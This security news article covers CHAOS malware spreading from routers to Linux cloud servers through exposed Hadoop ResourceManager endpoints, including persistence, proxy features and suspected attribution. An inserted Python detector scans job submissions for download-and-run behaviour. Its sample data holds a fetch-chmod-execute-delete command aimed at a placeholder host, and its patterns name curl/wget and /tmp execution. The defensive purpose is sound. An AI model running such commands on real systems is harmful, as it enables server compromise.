Chaos Malware Spreads to Linux Cloud Servers via Routers
CHAOS Malware Expands From Routers to Linux Cloud Servers
In a concerning development, the CHAOS malware, initially identified by Lumen’s Black Lotus Labs, has expanded its scope from targeting routers and edge devices to compromising Linux cloud servers.
- This shift marks a significant escalation in the threat landscape, as cloud servers often hold sensitive data and provide critical infrastructure for organizations.
- The attack begins with an HTTP request to the Hadoop deployment’s resource manager endpoint, which defines a new application and embeds a sequence of shell commands.
- These commands pull a CHAOS agent binary from an attacker-controlled server, set permissions, execute the binary, and delete it from disk.
- The CHAOS agent binary is served from a domain previously linked to Operation Silk Lure, a separate campaign that distributed the ValleyRAT remote access trojan through malicious job application attachments.
- The new CHAOS sample is a 64-bit ELF binary compiled for x86-64 Linux, marking a departure from earlier variants that targeted ARM, MIPS, and PowerPC architectures.
- The internal namespace was restructured, and several functions were rewritten or removed, including the SSH brute-forcing spreader and certain vulnerability exploitation routines previously inherited from Kaiji.
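The initial-access sequence described above (an application submitted to the Hadoop ResourceManager whose command fetches a binary, marks it executable, runs it and deletes it) can be screened for in logged submission bodies. The following detector is an added example written for this article, not code from the original report or from Darktrace; it assumes the `am-container-spec` / `commands` / `command` field layout of the YARN application-submission JSON and uses constructed sample submissions with placeholder values.

```python
import re

# Constructed sample: JSON bodies of POST requests to the ResourceManager
# application-submission endpoint, as a proxy or WAF might log them.
# Values are placeholders, not indicators from the article.
SAMPLE_SUBMISSIONS = [
    {
        "application-id": "application_0000000000000_0001",
        "application-name": "etl-nightly",
        "am-container-spec": {"commands": {"command": "/opt/jobs/run_etl.sh --date today"}},
    },
    {
        "application-id": "application_0000000000000_0002",
        "application-name": "x",
        "am-container-spec": {"commands": {"command":
            "curl -o /tmp/.a http://PLACEHOLDER/bin; chmod +x /tmp/.a; /tmp/.a; rm -f /tmp/.a"}},
    },
]

# One pattern per stage of the drop-and-run sequence the article describes:
# pull a binary over HTTP, set permissions, execute from a writable path, remove it.
STAGE_PATTERNS = {
    "download": re.compile(r"\b(curl|wget)\b.*https?://"),
    "chmod": re.compile(r"\bchmod\s+(\+x|[0-7]*7[0-7]*)\b"),
    "execute": re.compile(r"(^|[;&|]\s*)(\./|/tmp/|/dev/shm/|/var/tmp/)\S+"),
    "delete": re.compile(r"\brm\s+(-\w+\s+)*\S*"),
}

def matched_stages(command: str) -> list[str]:
    """Names of the stages whose pattern appears in the submitted command."""
    return [name for name, pat in STAGE_PATTERNS.items() if pat.search(command)]

def score_submission(submission: dict) -> dict:
    """Extract the AM command, match it against the stages, and decide whether to alert."""
    command = submission.get("am-container-spec", {}).get("commands", {}).get("command", "")
    stages = matched_stages(command)
    return {
        "application-id": submission.get("application-id"),
        "stages": stages,
        # Three of the four stages in one command is enough to raise an alert;
        # a legitimate job rarely downloads, chmods, runs and deletes in one line.
        "alert": len(stages) >= 3,
    }

def triage(submissions: list[dict]) -> list[str]:
    """Application ids that should be escalated for investigation."""
    return [r["application-id"] for r in map(score_submission, submissions) if r["alert"]]
```

Pair this with an inventory check that the ResourceManager REST endpoint is not reachable without authentication, since the screening only helps once a request has already been accepted.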
New Persistence Method
The malware establishes persistence using systemd and stores a keep-alive script on disk.
Proxy Functionality
The malware supports various protocols, including HTTP, TLS, TCP, UDP, and WebSocket, and features a SOCKS proxy function.
Circumstantial Evidence
While definitive attribution remains difficult, Darktrace’s analysis points to a suspected Chinese origin for CHAOS, based on Chinese-language strings in the malware binary and zh-CN locale indicators.
Conclusion
Organizations must prioritize proper security configurations and continuous monitoring to protect themselves against this evolving threat.